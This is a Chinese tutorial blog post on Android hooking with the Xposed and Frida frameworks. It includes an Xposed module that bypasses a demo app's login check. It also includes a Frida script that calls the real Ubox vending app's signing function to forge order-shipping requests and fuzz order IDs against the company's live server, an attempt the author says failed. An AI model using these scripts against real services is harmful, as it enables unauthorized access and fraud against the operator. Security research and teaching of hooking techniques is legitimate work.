浅谈android hook技术-阿里云开发者社区

开发者社区> 美人迟暮> 正文

浅谈android hook技术

简介:
+关注继续查看

浅谈android hook技术

 

 

 

前言

在测试android过程中,能对函数进行hook能帮助更加深入的进行测试,本文简单介绍了hook框架xposed和frida,从简单的小例子做了简单的演示,算是自己的学习的过程,是个入门的过程。


xposed框架


xposed,主页:http://repo.xposed.info/module/de.robv.android.xposed.installer是个开源的框架,在github上有源码的,直接下载apk后安装激活就可以使用,很多地方有这方面的教程,针对不同的手机架构,有大牛做了针对性的修改。可以在论坛中进行搜索,通过替换/system/bin/app_process程序控制zygote进程,使得app_process在启动过程中会加载XposedBridge.jar这个jar包,从而完成对Zygote进程及其创建的Dalvik虚拟机的劫持。



Xposed在开机的时候完成对所有的Hook Function的劫持,在原Function执行的前后加上自定义代码,很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架提供了很大的便利,xposed主要是对方法的hook,在以往的重打包技术中,需要对smali代码的进行修改,修改起来比较麻烦。


利用xposed框架可以很容易的获取到android应用中的信息,比如加密私钥、salt值等等,不需要反编译获取密钥转换算法、不需要了解密钥保存机制,直接hook函数,获取输入输出就可以。


原理

在Android系统中,应用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的应用程序进程时,都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去,从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。


Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意,一个应用程序进程被Zygote进程孵化出来的时候,不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native(JNI)方法hookMethodNative,这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析,不得不说,作者对于android的机制和java的了解已经相当深入了。


简单实例

很简单的一个android登入代码:

public class MainActivity extends AppCompatActivity {

private TextView accountView;
private TextView passwdView;
private Button loginBut;
private Button quitBut;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

accountView = (TextView) findViewById(R.id.account);
passwdView = (TextView) findViewById(R.id.pwd);

loginBut = (Button) findViewById(R.id.login);
quitBut = (Button) findViewById(R.id.quit);

loginBut.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
String username = accountView.getText() + "";
String password = passwdView.getText() + "";
if(isCorrectInfo(username,password)){
Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();
}
else{
Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show();
}
}
});
}

public boolean isCorrectInfo(String username, String password) {
if(username.equals("admin") && password.equals("passwd")){
return true;
}
else{
return false;
}
}

}

很简单的就是判断下用户输入的用户名和密码是正确,这里做个简单的演示,将用户输入的用户名和密码信息hook出来不管正确与否

简单说下xposed模块的开发,首先需要的是导入api,具体的可以参考:https://github.com/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API

在manifest中定义

<application android:label="xposed">
<meta-data
android:name="xposedmodule"
android:value="true" />
<meta-data
android:name="xposeddescription"
android:value="hook test" />
<meta-data
android:name="xposedminversion"
android:value="82" />
</application>

声明这个是xposed模块,名称为hook test 并且使用api版本号是82

下面创建运行时候的hook代码:

package com.example.xposed;

import java.util.List;

import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.callbacks.XC_LoadPackage;

import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;

public class Main implements IXposedHookLoadPackage {
// 包加载的时候回调
public void handleLoadPackage(final XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
//过滤掉不是com.example.logintest的应用
if (!lpparam.packageName.equals("com.example.logintest"))
return;
XposedBridge.log("加载应用:" + lpparam.packageName);

// Hook MainActivity 中的判断方法
findAndHookMethod("com.example.logintest.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,String.class new XC_MethodHook() {
@Override
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
super.beforeHookedMethod(param);
// XposedBridge.log("开始劫持~~~~");
// XposedBridge.log("参数1:" + param.args[0]);
XposedBridge.log("参数2:" + param.args[1]);
XposedBridge.log("修改登入数据~~~~");// 修改为正确的用户名密码
param.args[0]="admin";
param.args[1]="passwd";
}

@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
// super.afterHookedMethod(param);
XposedBridge.log("劫持结束~~~~");
// XposedBridge.log("参数1:" + param.args[0]);
// XposedBridge.log("参数2:" + param.args[1]);
}
});
}

}

看代码中的注释,主要是三个方法的调用,handleLoadPackage,主要是获取到android包的相关信息,这里由于只是对logintest进行hook,做下简单的判断。


findAndHookMethod 是主要的hook入口,里面几个参数分别为包名,classloader,hook的函数名,参数类型(这个比较容易出错,比如list类型写为List.class),回调函数


回调函数中比较重要的:beforeHookedMethod和afterHookedMethod,一个是在函数运行前劫持掉,一个是hook后放行,实例中对用户输入的字段进行劫持打印,后面将参数之改为正确登入用户名和密码,这样在app中输入任何字符都能登入成功


frida Hook框架

Frida是一款基于python + javascript 的hook框架,通杀android\ios\linux\win\osx等各平台,由于是基于脚本的交互,因此相比xposed和substrace cydia更加便捷,本文重点介绍Frida在android下面的使用。

Frida的官网为:http://www.frida.re/


安装

安装Frida非常简单,在pc端直接执行

pip install frida

即可


在Android设备需要导入frida的服务端,需要root你的手机

$ curl -O http://build.frida.re/frida/android/arm/bin/frida-server
$ chmod+x frida-server

$ adb push frida-server /data/local/tmp/


运行

设备上运行frida-server:

$ adb shell
root@android:/ # chmod 700 frida-server
$ adb shell
root@android:/ # /data/local/tmp/frida-server -t 0 (注意在root下运行)


电脑上运行adb forward tcp转发:

adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043


27042端口用于与frida-server通信,之后的每个端口对应每个注入的进程.

运行如下命令验证是否成功安装:

$ frida-ps-R


正常情况应该输出进程列表如下:

PID NAME
1590 com.facebook.katana
13194 com.facebook.katana:providers
12326 com.facebook.orca
13282 com.twitter.android


Hook模块的编写

hook的主要模块是js编写的,利用javascript的api与server进行通信

下面结合一个真实例子进行简单的介绍,首先是测试代码:

# -*- coding:utf-8 -*-

import frida, sys #引入frida类
import logging

logging.basicConfig(filename='test.log', level=logging.INFO)

reload(sys)
sys.setdefaultencoding('utf-8') #对输出进行utf8的编码
print sys.getdefaultencoding()

def print_result(message): #对输出的信息进行打印
print message
logging.info(message)

def on_message(message, data): # 反调函数,用来接受message的信息,message后面会说到
try:
print_result(message=message)
except:
pass

did = "255601452" # 订单id
time = "1472706588" # 时间戳

jscode = """ # 核心代码,这段主要是调用app中的相应处理函数,后面会分析这段代码的来源

Dalvik.perform(function () { # 说明是Dalvik平台
var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use("com.ub.main.d.e");# 调用com.ub.main.d.e类
var signInstance=signclass.$new(context); # 反射创建一个新的对象
var sign=signInstance.a("255601452"); #调用对象的a函数
send(sign); #将调用函数的结果发送出来
});
"""
#print jscode

process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # 获取连接的设备并枚举取最后一个设备连接,并附到com.ub.main的进程上面

print process

script = process.create_script(jscode) # 调用相应的js函数,获取函数调用后的结果值
script.on('message', on_message) # 利用回调,将message传递给on_message函数
print "done"
script.load()


反编译获取app中的核心函数

对于上面的js代码,其实就是调用app中的某个函数,比如sign值生成函数,加密解密函数,不需要自己单独的去分析算法流程,分析key值在哪,直接调用app的相应函数,让app帮我们完成这些工作

这里我们分析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会响应请求,自己掉货出来

下面对友宝的订单进行分析过程


1、抓取支付订单成功链接

http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4 postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588


分析:sign是校验值,主要是防止订单伪造的,orderid是产生的支付订单id,这个主要是防止伪造用


2、反编译友宝app

找到morder/shipping所在的包为:com/ub/main/d/e.class

其中localStringBuffer存储的就是url中的参数信息,该请求查找到的代码在a()

StringBuffer localStringBuffer = new StringBuffer();
localStringBuffer.append("clientversion");
localStringBuffer.append("=");
try
{
localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(), 0).versionName));
localStringBuffer.append("&");
localStringBuffer.append("machine_type");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(Build.MODEL));
localStringBuffer.append("&");
localStringBuffer.append("os");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));
localStringBuffer.append("&");
localStringBuffer.append("channel_id");
localStringBuffer.append("=");
localStringBuffer.append(this.g.u());
localStringBuffer.append("&");
localStringBuffer.append("device_no");
localStringBuffer.append("=");
Object localObject1 = "";
try
{
String str5 = Uri.encode(i.a(this.e));
localObject1 = str5;
}
catch (Exception localException1)
{
Object localObject2;
for (;;) {}
}
localStringBuffer.append((String)localObject1);
localStringBuffer.append("&");
localStringBuffer.append("imei");
localStringBuffer.append("=");
localObject2 = "";
try
{
String str4 = Uri.encode(i.b(this.e));
localObject2 = str4;
}
catch (Exception localException2)
{
boolean bool;
String str1;
String str2;
String str3;
for (;;) {}
}
localStringBuffer.append((String)localObject2);
localStringBuffer.append("&");
localStringBuffer.append("device_id");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode("2"));
localStringBuffer.append("&");
localStringBuffer.append("u");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(this.f.c()));
localStringBuffer.append("&");
localStringBuffer.append("wake_id");
localStringBuffer.append("=");
localStringBuffer.append("0");
localStringBuffer.append("&");
localStringBuffer.append("net_type");
localStringBuffer.append("=");
localStringBuffer.append(i.g(this.e));
localStringBuffer.append("&");
localStringBuffer.append("carrier_type");
localStringBuffer.append("=");
localStringBuffer.append(i.h(this.e));
bool = this.f.f();
str1 = this.f.l();
str2 = this.f.m();
if (bool)
{
str3 = "4";
l.a("weipeipei", "get参数---->isUboxAccount = " + bool + ", s = " + str3);
localStringBuffer.append("&");
localStringBuffer.append("s");
localStringBuffer.append("=");
localStringBuffer.append(str3);
return localStringBuffer.toString().trim();
}
}
catch (PackageManager.NameNotFoundException localNameNotFoundException)
{
for (;;)
{
localNameNotFoundException.printStackTrace();
continue;
if ((str1 != null) && (!str1.trim().equals(""))) {
str3 = "2";
} else if ((str2 != null) && (!str2.trim().equals(""))) {
str3 = "3";
} else {
str3 = "0";
}
}
}
}

生成签名的函数在com/ub/main/d/e.class中的b函数

public String b(String[][] paramArrayOfString)


输入的是一个array

上面的请求函数在:

public String a(String paramString)
{
String[][] arrayOfString = new String[2][];
arrayOfString[0] = { "orderId", paramString };
String[] arrayOfString1 = new String[2];
arrayOfString1[0] = "timestamp";
arrayOfString1[1] = d;
arrayOfString[1] = arrayOfString1;
return b(arrayOfString);
}


最后加上sign值,发送请求


3、可以反编译出他的sign计算方法,也可以直接调用b函数来产生sign值,后来发现app会自动取时间戳,我们就不需要给他array型的参数,直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了上面的js代码


4、自动化的批量处理

看代码

# __author__ = 'gaohe'
# -*- coding:utf-8 -*-

import frida, sys
import logging
import requests

logging.basicConfig(filename='test.log', level=logging.INFO)

reload(sys)
sys.setdefaultencoding('utf-8')

# print sys.getdefaultencoding()

class ubox:
def __init__(self):
pass

def request(self, payload):
# print "requests"
dict = {}
url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"
for i in payload.split("&"):
key = i.split("=")[0]
value = i.split("=")[1]
dict[key] = value

data=dict

r=requests.post(url=url,data=data)

print r.text

def print_result(self, message):
# print message
payload = message["payload"]
print payload
self.request(payload)

def on_message(self, message, data):
self.print_result(message=message)

def fuzzing(self, did):
jscode = """
Dalvik.perform(function () {
var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use("com.ub.main.d.e");
var signInstance=signclass.$new(context);
var sign=signInstance.a("%s");
send(sign);
});
""" % did
# print jscode
process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")
# print process
script = process.create_script(jscode)
script.on('message', self.on_message)
# print "done"
script.load()
# sys.stdin.read()

ub = ubox()
ub.fuzzing("255912964")


构造了一个类,后面直接fuzz uid就可以了,提取里面的sign值拼接到post数据中去

可以产生的post请求和抓到的数据包的请求是完全一样的,但是并没有测试成功,分析原因有可能是订单id和用户的id有所绑定。

不过学习到了怎样通过frida对app进行分析。


复杂参数的hook

如果遇到函数的参数类型是数组、map、ArrayList类型的,首先目标MyClass类的fun1函数,声明如下:

public static boolean fun1(String[][] strAry, Map mp1, Map<String,String> mp2, Map<Integer, String> mp3,
ArrayList<String> al1, ArrayList<Integer> al2, ArgClass ac)


解决方法:

用Xposed自身提供的XposedHelpers的findClass方法加载每一个类,然后再将得到的类传递给hook函数作参数!


参考链接:

https://xianzhi.aliyun.com/forum/read/611.html

http://www.freebuf.com/articles/terminal/56453.html

http://bbs.pediy.com/showthread.php?t=202147&page=2


本文来自合作伙伴“阿里聚安全”,发表于2017年03月17日 10:06.           

 

 

 

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
使用NAT网关轻松为单台云服务器设置多个公网IP
在应用中,有时会遇到用户询问如何使单台云服务器具备多个公网IP的问题。 具体如何操作呢,有了NAT网关这个也不是难题。
22600 0
阿里云服务器ECS远程登录用户名密码查询方法
阿里云服务器ECS远程连接登录输入用户名和密码,阿里云没有默认密码,如果购买时没设置需要先重置实例密码,Windows用户名是administrator,Linux账号是root,阿小云来详细说下阿里云服务器远程登录连接用户名和密码查询方法
2875 0
使用OpenApi弹性释放和设置云服务器ECS释放
云服务器ECS的一个重要特性就是按需创建资源。您可以在业务高峰期按需弹性的自定义规则进行资源创建,在完成业务计算的时候释放资源。本篇将提供几个Tips帮助您更加容易和自动化的完成云服务器的释放和弹性设置。
7769 0
windows server 2008阿里云ECS服务器安全设置
最近我们Sinesafe安全公司在为客户使用阿里云ecs服务器做安全的过程中,发现服务器基础安全性都没有做。为了为站长们提供更加有效的安全基础解决方案,我们Sinesafe将对阿里云服务器win2008 系统进行基础安全部署实战过程! 比较重要的几部分 1.
5466 0
阿里云服务器远程登录用户名和密码的查询方法
阿里云服务器远程连接登录用户名和密码在哪查看?阿里云服务器默认密码是什么?云服务器系统不同默认用户名不同
444 0
阿里云ECS云服务器初始化设置教程方法
阿里云ECS云服务器初始化是指将云服务器系统恢复到最初状态的过程,阿里云的服务器初始化是通过更换系统盘来实现的,是免费的,阿里云百科网分享服务器初始化教程: 服务器初始化教程方法 本文的服务器初始化是指将ECS云服务器系统恢复到最初状态,服务器中的数据也会被清空,所以初始化之前一定要先备份好。
3230 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,云吞铺子总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系统盘、创建快照、配置安全组等操作如何登录ECS云服务器控制台? 1、先登录到阿里云ECS服务器控制台 2、点击顶部的“控制台” 3、通过左侧栏,切换到“云服务器ECS”即可,如下图所示 通过ECS控制台的远程连接来登录到云服务器 阿里云ECS云服务器自带远程连接功能,使用该功能可以登录到云服务器,简单且方便,如下图:点击“远程连接”,第一次连接会自动生成6位数字密码,输入密码即可登录到云服务器上。
16851 0
阿里云服务器ECS登录用户名是什么?系统不同默认账号也不同
阿里云服务器Windows系统默认用户名administrator,Linux镜像服务器用户名root
1133 0
+关注
美人迟暮
Nothing for nothing.
1020
文章
212
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载